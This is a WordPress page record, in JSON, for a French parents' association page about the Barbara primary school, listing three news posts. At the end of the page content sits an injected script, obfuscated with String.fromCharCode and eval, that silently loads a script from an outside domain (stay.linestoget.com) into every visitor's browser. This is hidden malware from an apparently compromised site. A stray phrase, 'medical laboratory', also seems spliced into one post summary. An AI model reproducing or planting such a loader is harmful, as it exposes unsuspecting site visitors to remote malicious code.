{"id":7926,"date":"2021-09-03T02:22:40","date_gmt":"2021-09-03T00:22:40","guid":{"rendered":"http:\/\/actifeducation.fr\/?page_id=7926"},"modified":"2021-09-03T04:14:37","modified_gmt":"2021-09-03T02:14:37","slug":"barbara","status":"publish","type":"page","link":"http:\/\/actifeducation.fr\/?page_id=7926","title":{"rendered":"Barbara"},"content":{"rendered":"\n<div class=\"wp-block-cover has-black-background-color\" style=\"min-height:300px;aspect-ratio:unset;\"><img decoding=\"async\" class=\"wp-block-cover__image-background wp-image-117\" alt=\"\" src=\"https:\/\/iut.fourer.fr\/cartier_seb\/wp-content\/uploads\/2021\/04\/barbara.jpg\" style=\"object-position:32% 88%\" data-object-fit=\"cover\" data-object-position=\"32% 88%\"\/><div class=\"wp-block-cover__inner-container is-layout-flow wp-block-cover-is-layout-flow\">\n<p class=\"has-text-align-left\" style=\"font-size:50px\">\u00c9cole primaire Barbara<\/p>\n<\/div><\/div>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Vos  repr\u00e9sentant.e.s<\/h2>\n\n\n\n<p>Trombinoscope en construction<\/p>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Nos actions dans l&rsquo;\u00e9cole<\/h2>\n\n\n<style>.wp-show-posts-columns#wpsp-7995 {margin-left: -2em; }.wp-show-posts-columns#wpsp-7995 .wp-show-posts-inner {margin: 0 0 2em 2em; }<\/style><section id=\"wpsp-7995\" class=\" wp-show-posts-columns wp-show-posts\" style=\"\"><article class=\" wp-show-posts-single post-8054 post type-post status-publish format-standard has-post-thumbnail hentry category-barbara category-blancs-bouleaux category-nos-actions category-pasteur category-roux category-saint-exupery wpsp-col-4\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t<div class=\"wp-show-posts-image  wpsp-image-center \">\n\t\t\t<a href=\"http:\/\/actifeducation.fr\/?p=8054\"  title=\"R\u00e9union d&rsquo;information &#8211; Jeudi 9 septembre\"><img loading=\"lazy\" decoding=\"async\" width=\"1597\" height=\"877\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/IMG-20210907-WA0000-2.jpg\" class=\"attachment-full size-full wp-post-image\" alt=\"\" itemprop=\"image\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/IMG-20210907-WA0000-2.jpg 1597w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/IMG-20210907-WA0000-2-300x165.jpg 300w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/IMG-20210907-WA0000-2-1024x562.jpg 1024w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/IMG-20210907-WA0000-2-768x422.jpg 768w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/IMG-20210907-WA0000-2-1536x844.jpg 1536w\" sizes=\"auto, (max-width: 1597px) 100vw, 1597px\" \/><\/a>\t\t<\/div>\n\t\t\t\t\t\t\t\t<header class=\"wp-show-posts-entry-header\">\n\t\t\t\t\t\t\t<h3 class=\"wp-show-posts-entry-title\" itemprop=\"headline\"><a href=\"http:\/\/actifeducation.fr\/?p=8054\" rel=\"bookmark\">R\u00e9union d&rsquo;information &#8211; Jeudi 9 septembre<\/a><\/h3><div class=\"wp-show-posts-entry-meta wp-show-posts-entry-meta-below-title post-meta-inline\"><span class=\"wp-show-posts-posted-on wp-show-posts-meta\">\n\t\t\t\t\t<a href=\"http:\/\/actifeducation.fr\/?p=8054\" title=\"13:53\" rel=\"bookmark\"><time class=\"wp-show-posts-entry-date published\" datetime=\"2021-09-09T13:53:38+02:00\" itemprop=\"datePublished\">9 septembre 2021<\/time><time class=\"wp-show-posts-updated\" datetime=\"2021-09-09T13:55:53+02:00\" itemprop=\"dateModified\">9 septembre 2021<\/time><\/a>\n\t\t\t\t<\/span><\/div>\t\t\t\t\t\t<\/header><!-- .entry-header -->\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Au programme : Qui sommes-nous ?Quel est le r\u00f4le des repr\u00e9sentants de parents d&rsquo;\u00e9l\u00e8ves ?Pourquoi adh\u00e9rer ?\u00catre candidat sur une liste ? Mais \u00e9galement l&rsquo;occasion de se retrouver pour \u00e9changer&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-8045 post type-post status-publish format-standard has-post-thumbnail hentry category-barbara category-blancs-bouleaux category-nos-actions category-pasteur category-roux category-saint-exupery wpsp-col-4\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t<div class=\"wp-show-posts-image  wpsp-image-center \">\n\t\t\t<a href=\"http:\/\/actifeducation.fr\/?p=8045\"  title=\"Forum des associations 04\/09\/2021\"><img loading=\"lazy\" decoding=\"async\" width=\"348\" height=\"124\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/Outlook-my1j41zr.jpg\" class=\"attachment-full size-full wp-post-image\" alt=\"\" itemprop=\"image\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/Outlook-my1j41zr.jpg 348w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2021\/09\/Outlook-my1j41zr-300x107.jpg 300w\" sizes=\"auto, (max-width: 348px) 100vw, 348px\" \/><\/a>\t\t<\/div>\n\t\t\t\t\t\t\t\t<header class=\"wp-show-posts-entry-header\">\n\t\t\t\t\t\t\t<h3 class=\"wp-show-posts-entry-title\" itemprop=\"headline\"><a href=\"http:\/\/actifeducation.fr\/?p=8045\" rel=\"bookmark\">Forum des associations 04\/09\/2021<\/a><\/h3><div class=\"wp-show-posts-entry-meta wp-show-posts-entry-meta-below-title post-meta-inline\"><span class=\"wp-show-posts-posted-on wp-show-posts-meta\">\n\t\t\t\t\t<a href=\"http:\/\/actifeducation.fr\/?p=8045\" title=\"11:35\" rel=\"bookmark\"><time class=\"wp-show-posts-entry-date published\" datetime=\"2021-09-09T11:35:52+02:00\" itemprop=\"datePublished\">9 septembre 2021<\/time><time class=\"wp-show-posts-updated\" datetime=\"2023-10-30T09:12:25+01:00\" itemprop=\"dateModified\">30 octobre 2023<\/time><\/a>\n\t\t\t\t<\/span><\/div>\t\t\t\t\t\t<\/header><!-- .entry-header -->\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Retrouvez-nous sur le stand 34 au parc Andr\u00e9 Villette. ACTIF \u00c9ducation \u00e9tait pr\u00e9sent au Forum des associations. medical laboratory L&rsquo;occasion de se retrouver, de faire connaissance et d&rsquo;\u00e9changer sur les&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><article class=\" wp-show-posts-single post-7592 post type-post status-publish format-standard has-post-thumbnail hentry category-barbara category-blancs-bouleaux category-pasteur category-roux wpsp-col-4\" itemtype=\"http:\/\/schema.org\/CreativeWork\" itemscope><div class=\"wp-show-posts-inner\" style=\"\">\t\t<div class=\"wp-show-posts-image  wpsp-image-center \">\n\t\t\t<a href=\"http:\/\/actifeducation.fr\/?p=7592\"  title=\"2018 : notre mobilisation continue\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"434\" src=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/emotions-2975395_1920.jpg\" class=\"attachment-full size-full wp-post-image\" alt=\"\" itemprop=\"image\" srcset=\"http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/emotions-2975395_1920.jpg 768w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/emotions-2975395_1920-300x170.jpg 300w, http:\/\/actifeducation.fr\/wp-content\/uploads\/2018\/01\/emotions-2975395_1920-460x260.jpg 460w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/a>\t\t<\/div>\n\t\t\t\t\t\t\t\t<header class=\"wp-show-posts-entry-header\">\n\t\t\t\t\t\t\t<h3 class=\"wp-show-posts-entry-title\" itemprop=\"headline\"><a href=\"http:\/\/actifeducation.fr\/?p=7592\" rel=\"bookmark\">2018 : notre mobilisation continue<\/a><\/h3><div class=\"wp-show-posts-entry-meta wp-show-posts-entry-meta-below-title post-meta-inline\"><span class=\"wp-show-posts-posted-on wp-show-posts-meta\">\n\t\t\t\t\t<a href=\"http:\/\/actifeducation.fr\/?p=7592\" title=\"15:12\" rel=\"bookmark\"><time class=\"wp-show-posts-entry-date published\" datetime=\"2018-01-02T15:12:10+01:00\" itemprop=\"datePublished\">2 janvier 2018<\/time><time class=\"wp-show-posts-updated\" datetime=\"2018-01-23T16:42:25+01:00\" itemprop=\"dateModified\">23 janvier 2018<\/time><\/a>\n\t\t\t\t<\/span><\/div>\t\t\t\t\t\t<\/header><!-- .entry-header -->\n\t\t\t\t\t\t\t\t\t\t\t<div class=\"wp-show-posts-entry-summary\" itemprop=\"text\">\n\t\t\t\t\t\t\t<p>Vos repr\u00e9sentants des parents d&rsquo;\u00e9l\u00e8ves des Roux, Pasteur, Blancs Bouleaux et Barbara, ainsi que ceux du coll\u00e8ge Saint-Exup\u00e9ry vous souhaitent une Belle et Heureuse Ann\u00e9e 2018. Parmi les sujets sur&#8230;<\/p>\n\t\t\t\t\t\t<\/div><!-- .entry-summary -->\n\t\t\t\t\t<\/div><!-- wp-show-posts-inner --><\/article><div class=\"wpsp-clear\"><\/div><\/section><!-- .wp-show-posts -->\n\n\n\n<p>&nbsp;<\/p>\n<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,51,46,48,46,51,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>Vos repr\u00e9sentant.e.s Trombinoscope en construction Nos actions dans l&rsquo;\u00e9cole &nbsp;<\/p>\n","protected":false},"author":4,"featured_media":0,"parent":7925,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-sidebar-layout":"no-sidebar","site-content-layout":"plain-container","ast-global-header-display":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"disabled","ast-breadcrumbs-content":"disabled","ast-featured-img":"disabled","footer-sml-layout":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","footnotes":""},"class_list":["post-7926","page","type-page","status-publish","hentry"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/7926","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7926"}],"version-history":[{"count":11,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/7926\/revisions"}],"predecessor-version":[{"id":8002,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/7926\/revisions\/8002"}],"up":[{"embeddable":true,"href":"http:\/\/actifeducation.fr\/index.php?rest_route=\/wp\/v2\/pages\/7925"}],"wp:attachment":[{"href":"http:\/\/actifeducation.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7926"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}